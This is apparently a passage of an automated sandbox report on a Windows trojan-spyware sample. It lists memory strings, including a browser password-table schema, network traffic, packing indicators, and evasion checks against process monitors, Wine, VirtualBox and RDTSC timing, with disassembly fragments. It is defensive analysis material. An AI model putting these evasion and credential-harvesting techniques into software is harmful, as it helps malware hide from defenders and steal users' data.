              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016373C70_3_016373C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0163742A0_3_0163742A
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981938185736677
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2045451295.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060210778.0000000005D36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: file.exeString found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeU
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 2975744 > 1048576
              Source: file.exeStatic PE information: Raw size of syfhwmyd is bigger than: 0x100000 < 0x2aae00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;syfhwmyd:EW;vfrwkpsf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfhwmyd:EW;vfrwkpsf:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2d7c8b should be: 0x2e3ebf
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: syfhwmyd
              Source: file.exeStatic PE information: section name: vfrwkpsf
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01642EA9 push eax; ret 0_3_01642EF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01643212 pushad ; retf 0_3_016432E1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0165373A push ss; ret 0_3_0165373B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0165373A push ss; ret 0_3_0165373B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0165373A push ss; ret 0_3_0165373B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0165373A push ss; ret 0_3_0165373B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: file.exeStatic PE information: section name: entropy: 7.985188315102083

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F36E second address: 7F372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F382A second address: 1F384E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F466925DDA1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F39A4 second address: 1F39C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F4668B9A732h 0x0000000b jnc 00007F4668B9A726h 0x00000011 jc 00007F4668B9A726h 0x00000017 pushad 0x00000018 je 00007F4668B9A726h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6784 second address: 1F6789 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6789 second address: 1F67CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F4668B9A728h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 xor cl, 00000041h 0x00000027 push 00000000h 0x00000029 mov edx, 7754740Eh 0x0000002e call 00007F4668B9A729h 0x00000033 push eax 0x00000034 push edx 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F67CB second address: 1F67D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F67D1 second address: 1F67FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4668B9A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F4668B9A735h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F67FC second address: 1F6807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F466925DD96h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6807 second address: 1F6811 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4668B9A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6811 second address: 1F68AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jne 00007F466925DD9Eh 0x00000018 pop eax 0x00000019 sub dx, 7800h 0x0000001e push 00000003h 0x00000020 sub edi, dword ptr [ebp+122D366Dh] 0x00000026 push 00000000h 0x00000028 sub dword ptr [ebp+122D1C73h], eax 0x0000002e push 00000003h 0x00000030 xor dl, 00000060h 0x00000033 push BCF76667h 0x00000038 jg 00007F466925DDABh 0x0000003e xor dword ptr [esp], 7CF76667h 0x00000045 push ecx 0x00000046 jmp 00007F466925DD9Ch 0x0000004b pop edx 0x0000004c lea ebx, dword ptr [ebp+1244B673h] 0x00000052 mov dword ptr [ebp+122D358Dh], ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F466925DDA9h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F68AB second address: 1F68B5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4668B9A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6924 second address: 1F6930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6930 second address: 1F69DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F4668B9A728h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov esi, dword ptr [ebp+122D2C20h] 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D28FFh], ecx 0x00000031 push DDD718CAh 0x00000036 jno 00007F4668B9A744h 0x0000003c add dword ptr [esp], 2228E7B6h 0x00000043 mov edx, dword ptr [ebp+122D2BC4h] 0x00000049 push 00000003h 0x0000004b mov esi, eax 0x0000004d push 00000000h 0x0000004f sub edi, dword ptr [ebp+122D2C68h] 0x00000055 push 00000003h 0x00000057 call 00007F4668B9A72Ah 0x0000005c mov dx, si 0x0000005f pop edx 0x00000060 mov cx, bx 0x00000063 call 00007F4668B9A729h 0x00000068 push ecx 0x00000069 jp 00007F4668B9A72Ch 0x0000006f pop ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F69DC second address: 1F69E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F69E2 second address: 1F6A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jns 00007F4668B9A72Ch 0x00000011 jp 00007F4668B9A726h 0x00000017 pushad 0x00000018 jmp 00007F4668B9A739h 0x0000001d jmp 00007F4668B9A72Bh 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jno 00007F4668B9A72Eh 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jne 00007F4668B9A72Ah 0x00000036 pop eax 0x00000037 lea ebx, dword ptr [ebp+1244B67Ch] 0x0000003d sbb edi, 024E7B01h 0x00000043 xchg eax, ebx 0x00000044 push esi 0x00000045 jmp 00007F4668B9A733h 0x0000004a pop esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push ebx 0x0000004f jc 00007F4668B9A726h 0x00000055 pop ebx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6AE0 second address: 1F6B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a mov dword ptr [ebp+122D37E3h], ecx 0x00000010 pop edi 0x00000011 call 00007F466925DD99h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B00 second address: 1F6B0A instructions: 0x00000000 rdtsc 0x00000002 je 00007F4668B9A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B0A second address: 1F6B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F466925DDA7h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jbe 00007F466925DD9Ch 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 push edi 0x00000022 pushad 0x00000023 popad 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F466925DD9Fh 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B52 second address: 1F6B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B63 second address: 1F6B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F466925DD96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2171A6 second address: 2171D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4668B9A726h 0x00000009 jmp 00007F4668B9A72Fh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F4668B9A72Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2171D0 second address: 2171DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21501C second address: 21503C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A731h 0x00000009 pop eax 0x0000000a jns 00007F4668B9A72Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21503C second address: 215058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215058 second address: 21505E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21532A second address: 215337 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215337 second address: 215340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215340 second address: 215345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21564D second address: 215671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4668B9A726h 0x0000000a pushad 0x0000000b jmp 00007F4668B9A737h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215671 second address: 215682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F466925DD96h 0x0000000a js 00007F466925DD96h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2159B9 second address: 2159BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2159BD second address: 2159FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F466925DD9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F466925DDA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F466925DD96h 0x00000018 jmp 00007F466925DD9Dh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2159FD second address: 215A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A736h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215A17 second address: 215A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F466925DD9Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215A2E second address: 215A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215BC0 second address: 215BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
